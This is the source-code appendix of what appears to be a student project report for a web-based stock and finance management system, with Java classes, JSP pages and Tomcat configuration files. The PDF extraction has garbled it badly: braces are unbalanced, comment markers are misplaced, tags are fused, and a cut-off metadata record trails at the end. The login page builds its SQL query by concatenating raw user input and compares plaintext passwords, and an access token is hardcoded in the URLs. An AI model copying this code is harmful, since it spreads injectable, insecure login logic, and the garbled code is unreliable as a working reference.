"http://xml.island.com/ws/xml/timeandsales.xml?token=TXHE3PCsMdCGBWd7&symbol="+symbol+"&recNumb="+recNumb; Document doc = new SAXBuilder().build(timeAndSales); return (doc); } catch (Exception e) { e.printStackTrace(); } } String str = "There was an exception"+e; Element error = new Element("ERROR"); error.addContent(str); Document d = new Document(error); return(d); } // end buildDocument } // end class TimeAndSales TopList.java // Java Document for toplist.xml package rfms_modules; import java.io.*; import org.jdom.*; import org.jdom.input.*; import org.jdom.output.*; import java.util.*; import org.apache.xerces.parsers.*; public class TopList { //this is for test purposes only public static void main(String[] args) { Document d1 = buildDocument(20); displayTopList(d1); } // end main public static Date getDate() { return new java.util.Date(); } // end getDate public static Document buildDocument(int recNumb) { if (recNumb==0) { recNumb = 20; } try { String topListUrl = "http://xml.island.com/ws/xml/toplist.xml?token=TXHE3PCsMdCGBWd7&r cNumb="+recNumb; Document doc = new SAXBuilder().build(topListUrl); return (doc); } } } catch (Exception e) { e.printStackTrace(); String str = "There was an exception"+e; Element error = new Element("ERROR"); error.addContent(str); Document d = new Document(error); return(d); } } // end buildDocument public static void displayTopList(Document d) { System.out.println("\n\n\n\n\n"); //System.out.println(d.getRootElement()); Element stockList = d.getRootElement().getChild("stockList"); List stocks = stockList.getChildren(); for (int i=0, size=stocks.size(); i<size;i++) { Element stock = (Element)stocks.get(i); System.out.print(stock.getAttribute("rank").getValue()); System.out.println(stock.getAttribute("symbol").getValue()); System.out.println(stock.getChild("market").getValue()); System.out.println(stock.getChild("booked").getChild("bookedShares").getValue()); } } } // end displayTopList } // end class TopList /* loginVerify.jsp <%@ page contentType="text/html; charset=iso-8859-1" language="java" import="java.sql.*" errorPage="" %> <%@ page import="rfms_modules.*"%> <%@ page session="true"%> String username = request.getParameter("username"); String password = request.getParameter("password"); boolean foundRecord = false; boolean matched = false; try { Connection con = database.getConnection(); Statement st = con.createStatement(); ResultSet rs = st.executeQuery("select password,role from user where username='"+username+'"'); foundRecord = rs.first(); if (password.equals(rs.getString("password"))) { matched = true; } else { matched = false; } if (foundRecord&&matched) { session.setAttribute("username",username); if (rs.getString("role").equals("admin")) { response.sendRedirect("admin.jsp"); } else { response.sendRedirect("user.jsp"); } } */ else { response.sendRedirect("index.jsp?login=0"); } }%> getTopList.jsp <%@ page import="rfms_modules.*"%> <%@ page import="org.jdom.*, org.jdom.input.*, org.apache.xerces.parsers.*, java.sql.*, java.util.List"%> <%@ page language="java" contentType="text/html"%> <%@ page autoFlush = "true"%> <%@ page session = "false"%> <jsp:useBean id="tl" scope="page" class="rfms_modules.TopList"/> <html> <head> <title>Real-Time Finance Management System - Portfolio Management</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> </head> <body vLink=#ffe4ca aLink=#ffffff link=#ffffff background="./images/blueground.gif" text="#FFFFFF"> <TABLE width=500 border=0 align="center" cellPadding=0 cellSpacing=0> <TBODY> <TR> <TD height="74" align=middle vAlign=center> <font color="#0066FF" size="4" face="Georgia, Times New Roman, Times, serif">Real-Time Finance Management System</font></TD> </TR> </TBODY> </TABLE> </body> </html> <table align="center" width="100%"> <tr> </tr> </table> <table align="left" cellpadding="8" cellspacing="2" width="100%"> <tr> <td width="14%"> <table align="center" cellpadding="8" cellspacing="2" width="100%"> <tr> <td><div align="center"><font color="#FFFFF"><strong><font size="-1" face="Arial, Helvetica, sans-serif"><a href="../index.html">Home</a></strong></font></div></td> </tr> <tr> <td><div align="center"><font color="#FFFFF"><strong><font size="-1" face="Arial, Helvetica, sans-serif">Portfolio</strong></font></div></td> </tr> <tr> <td><div align="center"><font color="#FFFFF"><strong><font size="-1" face="Arial, Helvetica, sans-serif"><a href="reminders/index.html">Reminders</a></strong></font></div></td> </tr> <tr> <td><div align="center"><font color="#FFFFF"><strong><font size="-1" face="Arial, Helvetica, sans-serif"><a href="debt/index.html">Debt Planning</a></strong></font></div></td> </tr> <tr> <td><div align="center"><font color="#FFFFF"><strong><font size="-1" face="Arial, Helvetica, sans-serif"><a href="expenditures/index.html">Expenditures</a></strong></font></div></td> </tr> <tr> <td><div align="center"><font color="#FFFFF"><strong><font size="-1" face="Arial, Helvetica, sans-serif"><a href="account/index.html">Account</a></strong></font></div></td> </tr> </table> </td> </tr> </table> Information</a></font></strong></font></div></td> </tr> <tr><td> <p>&nbsp;</p> </td> <td width="86%"xtable </table> <p>&nbsp;</px/td> <form name="form1" method="post" action="getQuote.jsp"> <p align="right"xfont <font color="#FFFFFF"xstrongxfont size="-l">Get Quote: </font></p> <input name="stockName" type="text" id="stockName" size="10"> <input type="submit" name="Submit" value="GO"> </form> </p> </div> <pxstrongxfont size="6">Top List</fontx/strongx/p> table width="100%" border="2" align="center" cellspacing="2" cellspacing="2"> <tr> <td><div align="center">RANK</font> </div></td> <td><div align="center">SYMBOL</font> </div></td> <td><div align="center">MARKET</font> </div></td> </tr> </table> Document d = tl.buildDocument(Integer.parseInt(request.getParameter("recNumb"))); Element root = d.getRootElement(); Element stockList = root.getChild("stockList"); List stocks = stockList.getChildren(); for (int i=0, size=stocks.size(); i<size; i++) { Element stock = (Element)stocks.get(i); <tr> <td><div align="center"><font size="-1">PRICE</font></div></td> <td><div align="center"><font size="-1">TIME</font></div></td> <td><div align="center"><font size="-1">MATCHED SHARES</font></div></td> </tr> <td><div align="center"><font size="-1">out.print(stock.getAttribute("rank").getValue());</font></div></td> <td><div align="center"><font size="-1">out.print(stock.getAttribute("symbol").getValue());</font></div></td> <td><div align="center"><font size="-1">out.print(stock.getChild("market").getValue());</font></div></td> <td><div align="center"><font size="-1">out.print(stock.getChild("matched").getChild("lastMatch").getChild("matchPrice").getValue());</font></div></td> <td><div align="center"><font size="-1">out.print(stock.getChild("matched").getChild("lastMatch").getChild("matchTime").getValue());</font></div></td> <td><div align="center"><font size="-1">out.print(stock.getChild("matched").getChild("matchedShares").getValue());</font></div></td> </tr> </%> getQuote.jsp <%@ page import="rfms_modules.*"%> <%@ page import="org.jdom.input.*"%> <%@ page import="java.sql.*"%> <%@ page language="java" contentType="text/html"%> <%@ page autoFlush = "true"%> <%@ page session = "false"%> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Real-Time Finance Management System - Portfolio Management</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body vLink=#ffe4ca aLink=#ffffff link=#ff00ff background="/images/bluebackground.gif"> <TABLE width=500 border=0 align="center" cellPadding=0 cellSpacing=0> <TR> </TR> </TABLE> </body> </html> Real-Time Finance Management System Home Portfolio Reminders <table> <thead> <tr> <th></th> <th>Debt Planning</th> <th>Expenditures</th> <th>Account Information</th> </tr> </thead> </table> ```html <p> <form name="form1" method="post" action="getQuote.jsp"> <p align="center">Get Quote: </p> <input name="stockName" type="text" id="stockName" size="10"> <input type="submit" name="Submit" value="GO"> </form> </p> ``` Here is the quote that you requested for: ```jsp //StockInfo si = new StockInfo(); String stockQuote = si.getSingleQuote(request.getParameter("stockName")); out.println("My Name is Muku"); out.println(stockQuote); out.println("<br>"); out.println(date.getDate()); ``` <table> <thead> <tr> <th>Market Session</th> <th>Match Price</th> <th>Match Time</th> <th>Matched Shares</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> <td></td> </tr> </tbody> </table> <table> </div> <p align="center"> </p> </td> </tr></table> </td> </tr></table> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> </body> </html> // end getQuote.jsp goingTimeAndSales.jsp <%@ page import="rfms_modules.*"%> <%@ page import="org.jdom.*, org.jdom.input.*, org.apache.xerces.parsers.*, java.sql.*, java.util.List"%> <%@ page language="java" contentType="text/html"%> <%@ page autoFlush = "true"%> <%@ page session = "false"%> <jsp:useBean id="ts" scope="page" class="rfms_modules.TimeAndSales"/> <html> 63 ### Real-Time Finance Management System – Portfolio Management Real-Time Finance Management System --- **Home** **Portfolio Management** **Reminders** **Debt Planning** **Expenditures** <tr> <td align="center" width="86%"><table width="100%"> <p align="center"> <form name="form1" method="post" action="getQuote.jsp"> <p align="right"> Get Quote: <input name="stockName" type="text" id="stockName" size="10"> <input type="submit" name="Submit" value="GO"> </p> </form> </p> </td></tr> </table></td> </tr> <tr> <td align="center" width="86%"> <p align="center"> String recNumbString = request.getParameter("recNumb"); int recNumbInt = Integer.parseInt(recNumbString); String symbol = request.getParameter("symbol"); out.println(recNumbString); out.println(" "); </p> </td> </tr> <tr> <td align="center"> <p align="center"> Time and Sales </p> </td> </tr> if (recNumbInt>1) {out.print("Sales");} else {out.print("Sale");} out.print("for "+symbol); % </font></strong></p> <table width="100%" border="2" align="center" cellpadding="2" cellspacing="2"> <tr> <td align="center"><strong><font size="-1">#</font></strong></td> <td align="center"><strong><font size="-1">MATCHED<br>SHARES</font></strong></td> <td align="center"><font size="-1">PRICE</font></td> <td align="center"><font size="-1">TIME</font></td> <td align="center"><font size="-1">MATCH<br>TYPE</font></td> <td align="center"><font size="-1">REFERENCE<br>NUMBER</font></td> </tr> <tr> <td align="center"><font size="-1">1</font></td> <td align="center"><font size="-1">MATCHED<br>SHARES</font></td> <td align="center"><font size="-1">PRICE</font></td> <td align="center"><font size="-1">TIME</font></td> <td align="center"><font size="-1">MATCH<br>TYPE</font></td> <td align="center"><font size="-1">REFERENCE<br>NUMBER</font></td> </tr> <tr> <td align="center"><font size="-1">1</font></td> <td align="center"><strong><font size="-1">2</font></strong></td> <td align="center"><font size="-1">PRICE</font></td> <td align="center"><font size="-1">TIME</font></td> <td align="center"><font size="-1">MATCH<br>TYPE</font></td> <td align="center"><font size="-1">REFERENCE<br>NUMBER</font></td> </tr> </table> web.xml <?xml version="1.0" encoding="ISO-8859-1"?> <!-- Copyright 2004 The Apache Software Foundation Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.4"> <display-name>Welcome to Tomcat</display-name> <description> Welcome to Tomcat </description> </web-app> <resource-ref> <description> Resource reference to a factory for java.sql.Connection instances that may be used for talking to a particular database that is configured in the server.xml file. </description> <res-ref-name>jdbc/rfms</res-ref-name> <res-type>javax.sql.DataSource</res-type> <res-auth>Container</res-auth> </resource-ref> </web-app> // end web.xml **server.xml** <!-- Example Server Configuration File --> <!-- Note that component elements are nested corresponding to their parent-child relationships with each other --> <!-- A "Server" is a singleton element that represents the entire JVM, which may contain one or more "Service" instances. The Server listens for a shutdown command on the indicated port. Note: A "Server" is not itself a "Container", so you may not define subcomponents such as "Valves" or "Loggers" at this level. --> <Server port="8005" shutdown="SHUTDOWN"> <!-- Comment these entries out to disable JMX MBeans support used for the administration web application --> <Listener className="org.apache.catalina.mbeans.ServerLifecycleListener" /> <Listener className="org.apache.catalina.mbeans.GlobalResourcesLifecycleListener" /> <Listener className="org.apache.catalina.storeconfig.StoreConfigLifecycleListener" /> <!-- Global JNDI resources --> <GlobalNamingResources> <!-- Test entry for demonstration purposes --> <Environment name="simpleValue" type="java.lang.Integer" value="30"/> <!-- Editable user database that can also be used by UserDatabaseRealm to authenticate users --> <Resource name="UserDatabase" auth="Container" type="org.apache.catalina.UserDatabase" description="User database that can be updated and saved" factory="org.apache.catalina.users.MemoryUserDatabaseFactory" pathname="conf/tomcat-users.xml" /> </GlobalNamingResources> <!-- A "Service" is a collection of one or more "Connectors" that share a single "Container" (and therefore the web applications visible within that Container). Normally, that Container is an "Engine", but this is not required. Note: A "Service" is not itself a "Container", so you may not define subcomponents such as "Valves" or "Loggers" at this level. --> <!-- Define the Tomcat Stand-Alone Service --> <Service name="Catalina"> <!-- A "Connector" represents an endpoint by which requests are received and responses are returned. Each Connector passes requests on to the associated "Container" (normally an Engine) for processing. By default, a non-SSL HTTP/1.1 Connector is established on port 8080. You can also enable an SSL HTTP/1.1 Connector on port 8443 by following the instructions below and uncommenting the second Connector entry. SSL support requires the following steps (see the SSL Config HOWTO in the Tomcat 5 documentation bundle for more detailed instructions): * If your JDK version 1.3 or prior, download and install JSSE 1.0.2 or later, and put the JAR files into "$JAVA_HOME/jre/lib/ext". * Execute: %JAVA_HOME%\bin\keytool -genkey -alias tomcat -keyalg RSA (Windows) $JAVA_HOME/bin/keytool -genkey -alias tomcat -keyalg RSA (Unix) with a password value of "changeit" for both the certificate and the keystore itself. By default, DNS lookups are enabled when a web application calls request.getRemoteHost(). This can have an adverse impact on performance, so you can disable it by setting the "enableLookups" attribute to "false". When DNS lookups are disabled, request.getRemoteHost() will return the String version of the IP address of the remote client. --> 69 <!-- Define a non-SSL HTTP/1.1 Connector on port 8080 --> <Connector="8080" maxThreads="150" minSpareThreads="25" maxSpareThreads="75" enableLookups="false" redirectPort="8443" acceptCount="100" connectionTimeout="20000" disableUploadTimeout="true" /> <!-- Note: To disable connection timeouts, set connectionTimeout value to 0 --> <!-- Note: To use gzip compression you could set the following properties: compression="on" compressionMinSize="2048" noCompressionUserAgents="gozilla, traviata" compressableMimeType="text/html, text/xml" --> <!-- Define a SSL HTTP/1.1 Connector on port 8443 --> <Connector port="8443" maxThreads="150" minSpareThreads="25" maxSpareThreads="75" enableLookups="false" disableUploadTimeout="true" acceptCount="100" scheme="https" secure="true" clientAuth="false" sslProtocol="TLS" /> <!-- Define an AJP 1.3 Connector on port 8009 --> <Connector port="8009" enableLookups="false" redirectPort="8443" protocol="AJP/1.3" /> <!-- Define a Proxied HTTP/1.1 Connector on port 8082 --> <!-- See proxy documentation for more information about using this. --> <Connector port="8082" maxThreads="150" minSpareThreads="25" maxSpareThreads="75" enableLookups="false" acceptCount="100" connectionTimeout="20000" proxyPort="80" disableUploadTimeout="true" /> <!-- An Engine represents the entry point (within Catalina) that processes every request. The Engine implementation for Tomcat stand alone analyzes the HTTP headers included with the request, and passes them on to the appropriate Host (virtual host). --> <!-- You should set jvmRoute to support load-balancing via AJP ie: <Engine name="Standalone" defaultHost="localhost" jvmRoute="jvm1" /> --> <!-- Define the top level container in our container hierarchy --> <!--<Engine name="Catalina" defaultHost="localhost">--> <!--<Engine name="Catalina" defaultHost="localhost">--> <!-- The request dumper valve dumps useful debugging information about the request headers and cookies that were received, and the response --> headers and cookies that were sent, for all requests received by this instance of Tomcat. If you care only about requests to a particular virtual host, or a particular application, nest this element inside the corresponding <Host> or <Context> entry instead. For a similar mechanism that is portable to all Servlet 2.4 containers, check out the "RequestDumperFilter" Filter in the example application (the source for this filter may be found in "$CATALINA_HOME/webapps/examples WEB-INF/classes/filters"). Request dumping is disabled by default. Uncomment the following element to enable it. --> <!- <Valve className="org.apache.catalina.valves.RequestDumperValve"/> --> <!-- Because this Realm is here, an instance will be shared globally --> <!-- This Realm uses the UserDatabase configured in the global JNDI resources under the key "UserDatabase". Any edits that are performed against this UserDatabase are immediately available for use by the Realm. --> <Realm className="org.apache.catalina.realm.UserDatabaseRealm" resourceName="UserDatabase"/> <!-- Comment out the old realm but leave here for now in case we need to go back quickly --> <!-- Replace the above Realm with one of the following to get a Realm stored in a database and accessed via JDBC --> <!-- <Realm className="org.apache.catalina.realm.JDBCRealm" driverName="org.gjt.mm.mysql.Driver" connectionURL="jdbc:mysql://localhost/authority" connectionName="test" connectionPassword="test" userTable="users" userNameCol="user_name" userCredCol="user_pass" userRoleTable="user_roles" roleNameCol="role_name" /> --> <!-- <Realm className="org.apache.catalina.realm.JDBCRealm" driverName="oracle.jdbc.driver.OracleDriver" connectionURL="jdbc:oracle:thin:@ntserver:1521:ORCL" connectionName="seott" connectionPassword="tiger" userTable="users" userNameCol="user_name" userCredCol="user_pass" userRoleTable="user_roles" roleNameCol="role_name" /> --> 71 <Realm className="org.apache.catalina.realm.JDBCRealm" driverName="sun.jdbc.odbc.JdbcOdbcDriver" connectionURL="jdbc:odbc:CATALINA" userTable="users" userNameCol="user_name" userCredCol="user_pass" userRoleTable="user_roles" roleNameCol="role_name" /> <!-- Define the default virtual host Note: XML Schema validation will not work with Xerces 2.2. --> <Host name="localhost" appBase="webapps" unpackWARs="true" autoDeploy="true" xmlValidation="false" xmlns="false" xmlns:namespaceAware="false"> <!-- Defines a cluster for this node, By defining this element, means that every manager will be changed. So when running a cluster, only make sure that you have webapps in there that need to be clustered and remove the other ones. A cluster has the following parameters: className = the fully qualified name of the cluster class name = a descriptive name for your cluster, can be anything mcastAddr = the multicast address, has to be the same for all the nodes mcastPort = the multicast port, has to be the same for all the nodes mcastBindAddr = bind the multicast socket to a specific address mcastTTL = the multicast TTL if you want to limit your broadcast mcastSoTimeout = the multicast readtimeout mcastFrequency = the number of milliseconds in between sending a "I'm alive" heartbeat mcastDropTime = the number a milliseconds before a node is considered "dead" if no heartbeat is received tcpThreadCount = the number of threads to handle incoming replication requests, optimal would be the same amount of threads as nodes tcpListenAddress = the listen address (bind address) for TCP cluster request on this host, in case of multiple ethernet cards. auto means that address becomes InetAddress.getLocalHost().getHostAddress() tcpListenPort = the tcp listen port tcpSelectorTimeout = the timeout (ms) for the Selector.select() method in case the OS has a wakup bug in java.nio. Set to 0 for no timeout 72 printToScreen = true means that managers will also print to std.out expireSessionsOnShutdown = true means that useDirtyFlag = true means that we only replicate a session after setAttribute,removeAttribute has been called. false means to replicate the session after each request. false means that replication would work for the following piece of code: (only for SimpleTcpReplicationManager) <%= HashMap map = (HashMap)session.getAttribute("map"); map.put("key","value"); %> replicationMode = can be either 'pooled', 'synchronous' or 'asynchronous'. * Pooled means that the replication happens using several sockets in a synchronous way. Ie, the data gets replicated, then the request return. This is the same as the 'synchronous' setting except it uses a pool of sockets, hence it is multithreaded. This is the fastest and safest configuration. To use this, also increase the nr of tcp threads that you have dealing with replication. * Synchronous means that the thread that executes the request, is also the thread replicates the data to the other nodes, and will not return until all nodes have received the information. * Asynchronous means that there is a specific 'sender' thread for each cluster node, so the request thread will queue the replication request into a "smart" queue, and then return to the client. The "smart" queue is a queue where when a session is added to the queue, and the same session already exists in the queue from a previous request, that session will be replaced in the queue instead of replicating two requests. This almost never happens, unless there is a large network delay. --> <!-- When configuring for clustering, you also add in a valve to catch all the requests coming in, at the end of the request, the session may or may not be replicated. A session is replicated if and only if all the conditions are met: 1. useDirtyFlag is true or setAttribute or removeAttribute has been called AND 2. a session exists (has been created) 3. the request is not trapped by the "filter" attribute The filter attribute is to filter out requests that could not modify the session, and hence we don't replicate the session after the end of this request. The filter is negative, ie, anything you put in the filter, you mean to filter out, ie, no replication will be done on requests that match one of the filters. The filter attribute is delimited by ;, so you can't escape out ; even if you wanted to. filter="*.gif; *.js;" means that we will not replicate the session after requests with the URI ending with .gif and .js are intercepted. The deployer element can be used to deploy apps cluster wide. Currently the deployment only deploys/undeploys to working members in the cluster so no WARs are copied upon startup of a broken node. The deployer watches a directory (watchDir) for WAR files when watchEnabled="true" When a new war file is added the war gets deployed to the local instance, and then deployed to the other instances in the cluster. When a war file is deleted from the watchDir the war is undeployed locally and cluster wide --> <!-- <Cluster className="org.apache.catalina.cluster.tcp.SimpleTcpCluster" managerClassName="org.apache.catalina.cluster.session.DeltaManager" expireSessionsOnShutdown="false" useDirtyFlag="true" notifyListenersOnReplication="true"> <Membership className="org.apache.catalina.cluster.mcast.McastService" mcastAddr="228.0.0.4" mcastPort="45564" mcastFrequency="500" mcastDropTime="3000"/> <Receiver className="org.apache.catalina.cluster.tcp.ReplicationListener" tcpListenAddress="auto" tcpListenPort="4001" tcpSelectorTimeout="100" tcpThreadCount="6"/> <Sender className="org.apache.catalina.cluster.tcp.ReplicationTransmitter" replicationMode="pooled" ackTimeout="15000"/> <Valve className="org.apache.catalina.cluster.tcp.ReplicationValve" filter=".*\.gif;.*\.js;.*\.jpg;.*\.htm;.*\.html;.*\.txt;"/> <Deployer className="org.apache.catalina.cluster.deploy.FarmWarDeployer" tempDir="/tmp/war-temp/" deployDir="/tmp/war-deploy/" watchDir="/tmp/war-listen/" watchEnabled="false"/> </Cluster> --> <!-- Normally, users must authenticate themselves to each web app individually. Uncomment the following entry if you would like a user to be authenticated the first time they encounter a resource protected by a security constraint, and then have that user identity maintained across *all* web applications contained in this virtual host. --> <Valve className="org.apache.catalina.authenticator.SingleSignOn"/> Access log processes all requests for this virtual host. By default, log files are created in the "logs" directory relative to $CATALINA_HOME. If you wish, you can specify a different directory with the "directory" attribute. Specify either a relative (to $CATALINA_HOME) or absolute path to the desired directory. Access log processes all requests for this virtual host. By default, log files are created in the "logs" directory relative to $CATALINA_HOME. If you wish, you can specify a different directory with the "directory" attribute. Specify either a relative (to $CATALINA_HOME) or absolute path to the desired directory. This access log implementation is optimized for maximum performance, but is hardcoded to support only the "common" and "combined" patterns. Begin MyWebApp context definition. |<Resource name="jdbc/rfmsDS" auth="Container" type="javax.sql.DataSource"/> |<ResourceParams name="jdbc/rfmsDS"> <parameter> <name>factory</name> <value>org.apache.commons.dbcp.BasicDataSourceFactory</value> </parameter> |The JDBC connection URL for connecting to your MySQL DB. The `autoReconnect=true` argument to the URL makes sure that the MySQL JDBC Driver will automatically reconnect if mysqld closed the connection. mysqld by default closes idle connections after 8 hours. ```xml <parameter> <name>url</name> <value>jdbc:mysql://localhost/rfms autoReconnect=true</value> </parameter> ``` MySQL username and password for DB connections. ```xml <parameter> <name>driverClassName</name> <value>com.mysql.jdbc.Driver</value> </parameter> ``` Maximum number of DB connections in pool. Make sure you configure your mysqld `max_connections` large enough to handle all of your DB connections. Set to 0 for no limit. ```xml <parameter> <name>maxActive</name> <value>100</value> </parameter> ``` Maximum number of idle DB connections to retain in pool. Set to 0 for no limit. ```xml <parameter> <name>maxIdle</name> <value>30</value> </parameter> ``` Maximum time to wait for a DB connection to become available in ms, in this example 10 seconds. An exception is thrown if this timeout is exceeded. Set to -1 to wait indefinitely. ```xml <parameter> <name>maxWait</name> <value>10000</value> </parameter> ``` </parameter> </ResourceParams> </Context> </Host> </Engine> </Service> </Server> // end server.xml REFERENCES
{"Source-Url": "https://scholarworks.lib.csusb.edu/cgi/viewcontent.cgi?article=4009&context=etd-project", "len_cl100k_base": 15695, "olmocr-version": "0.1.53", "pdf-total-pages": 85, "total-fallback-pages": 0, "total-input-tokens": 221000, "total-output-tokens": 20043, "length": "2e13", "weborganizer": {"__label__adult": 0.00048661231994628906, "__label__art_design": 0.0004968643188476562, "__label__crime_law": 0.0003578662872314453, "__label__education_jobs": 0.0024585723876953125, "__label__entertainment": 0.00010645389556884766, "__label__fashion_beauty": 0.0002310276031494141, "__label__finance_business": 0.0058135986328125, "__label__food_dining": 0.0004620552062988281, "__label__games": 0.0007648468017578125, "__label__hardware": 0.0010480880737304688, "__label__health": 0.0003757476806640625, "__label__history": 0.00021219253540039065, "__label__home_hobbies": 0.00014078617095947266, "__label__industrial": 0.00045228004455566406, "__label__literature": 0.0001970529556274414, "__label__politics": 0.00025343894958496094, "__label__religion": 0.00033473968505859375, "__label__science_tech": 0.0044403076171875, "__label__social_life": 0.00012314319610595703, "__label__software": 0.011810302734375, "__label__software_dev": 0.96826171875, "__label__sports_fitness": 0.00031256675720214844, "__label__transportation": 0.0006623268127441406, "__label__travel": 0.00022494792938232425}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 68628, 0.01904]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 68628, 0.53857]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 68628, 0.78446]], "google_gemma-3-12b-it_contains_pii": [[0, 598, false], [598, 845, null], [845, 1102, null], [1102, 1124, null], [1124, 2214, null], [2214, 2836, null], [2836, 4423, null], [4423, 4423, null], [4423, 5639, null], [5639, 6711, null], [6711, 7702, null], [7702, 8694, null], [8694, 9761, null], [9761, 10856, null], [10856, 11922, null], [11922, 12862, null], [12862, 13803, null], [13803, 14494, null], [14494, 14568, null], [14568, 15077, null], [15077, 16283, null], [16283, 16975, null], [16975, 17747, null], [17747, 18581, null], [18581, 19638, null], [19638, 20295, null], [20295, 21241, null], [21241, 22229, null], [22229, 22915, null], [22915, 23737, null], [23737, 24631, null], [24631, 25574, null], [25574, 26362, null], [26362, 27190, null], [27190, 27955, null], [27955, 28278, null], [28278, 28425, null], [28425, 28562, null], [28562, 28734, null], [28734, 29062, null], [29062, 29439, null], [29439, 29957, null], [29957, 30360, null], [30360, 30586, null], [30586, 30753, null], [30753, 31886, null], [31886, 32957, null], [32957, 33645, null], [33645, 33683, null], [33683, 34420, null], [34420, 34944, null], [34944, 35736, null], [35736, 36597, null], [36597, 37662, null], [37662, 38566, null], [38566, 38764, null], [38764, 39615, null], [39615, 40536, null], [40536, 41499, null], [41499, 41559, null], [41559, 42455, null], [42455, 43964, null], [43964, 44670, null], [44670, 46061, null], [46061, 46719, null], [46719, 46781, null], [46781, 47134, null], [47134, 47408, null], [47408, 47660, null], [47660, 48262, null], [48262, 48455, null], [48455, 49347, null], [49347, 50659, null], [50659, 51633, null], [51633, 52922, null], [52922, 55150, null], [55150, 57196, null], [57196, 59181, null], [59181, 61185, null], [61185, 63986, null], [63986, 65688, null], [65688, 66861, null], [66861, 68027, null], [68027, 68127, null], [68127, 68628, null]], "google_gemma-3-12b-it_is_public_document": [[0, 598, true], [598, 845, null], [845, 1102, null], [1102, 1124, null], [1124, 2214, null], [2214, 2836, null], [2836, 4423, null], [4423, 4423, null], [4423, 5639, null], [5639, 6711, null], [6711, 7702, null], [7702, 8694, null], [8694, 9761, null], [9761, 10856, null], [10856, 11922, null], [11922, 12862, null], [12862, 13803, null], [13803, 14494, null], [14494, 14568, null], [14568, 15077, null], [15077, 16283, null], [16283, 16975, null], [16975, 17747, null], [17747, 18581, null], [18581, 19638, null], [19638, 20295, null], [20295, 21241, null], [21241, 22229, null], [22229, 22915, null], [22915, 23737, null], [23737, 24631, null], [24631, 25574, null], [25574, 26362, null], [26362, 27190, null], [27190, 27955, null], [27955, 28278, null], [28278, 28425, null], [28425, 28562, null], [28562, 28734, null], [28734, 29062, null], [29062, 29439, null], [29439, 29957, null], [29957, 30360, null], [30360, 30586, null], [30586, 30753, null], [30753, 31886, null], [31886, 32957, null], [32957, 33645, null], [33645, 33683, null], [33683, 34420, null], [34420, 34944, null], [34944, 35736, null], [35736, 36597, null], [36597, 37662, null], [37662, 38566, null], [38566, 38764, null], [38764, 39615, null], [39615, 40536, null], [40536, 41499, null], [41499, 41559, null], [41559, 42455, null], [42455, 43964, null], [43964, 44670, null], [44670, 46061, null], [46061, 46719, null], [46719, 46781, null], [46781, 47134, null], [47134, 47408, null], [47408, 47660, null], [47660, 48262, null], [48262, 48455, null], [48455, 49347, null], [49347, 50659, null], [50659, 51633, null], [51633, 52922, null], [52922, 55150, null], [55150, 57196, null], [57196, 59181, null], [59181, 61185, null], [61185, 63986, null], [63986, 65688, null], [65688, 66861, null], [66861, 68027, null], [68027, 68127, null], [68127, 68628, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 68628, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 68628, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 68628, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 68628, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 68628, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 68628, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 68628, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 68628, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 68628, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 68628, null]], "pdf_page_numbers": [[0, 598, 1], [598, 845, 2], [845, 1102, 3], [1102, 1124, 4], [1124, 2214, 5], [2214, 2836, 6], [2836, 4423, 7], [4423, 4423, 8], [4423, 5639, 9], [5639, 6711, 10], [6711, 7702, 11], [7702, 8694, 12], [8694, 9761, 13], [9761, 10856, 14], [10856, 11922, 15], [11922, 12862, 16], [12862, 13803, 17], [13803, 14494, 18], [14494, 14568, 19], [14568, 15077, 20], [15077, 16283, 21], [16283, 16975, 22], [16975, 17747, 23], [17747, 18581, 24], [18581, 19638, 25], [19638, 20295, 26], [20295, 21241, 27], [21241, 22229, 28], [22229, 22915, 29], [22915, 23737, 30], [23737, 24631, 31], [24631, 25574, 32], [25574, 26362, 33], [26362, 27190, 34], [27190, 27955, 35], [27955, 28278, 36], [28278, 28425, 37], [28425, 28562, 38], [28562, 28734, 39], [28734, 29062, 40], [29062, 29439, 41], [29439, 29957, 42], [29957, 30360, 43], [30360, 30586, 44], [30586, 30753, 45], [30753, 31886, 46], [31886, 32957, 47], [32957, 33645, 48], [33645, 33683, 49], [33683, 34420, 50], [34420, 34944, 51], [34944, 35736, 52], [35736, 36597, 53], [36597, 37662, 54], [37662, 38566, 55], [38566, 38764, 56], [38764, 39615, 57], [39615, 40536, 58], [40536, 41499, 59], [41499, 41559, 60], [41559, 42455, 61], [42455, 43964, 62], [43964, 44670, 63], [44670, 46061, 64], [46061, 46719, 65], [46719, 46781, 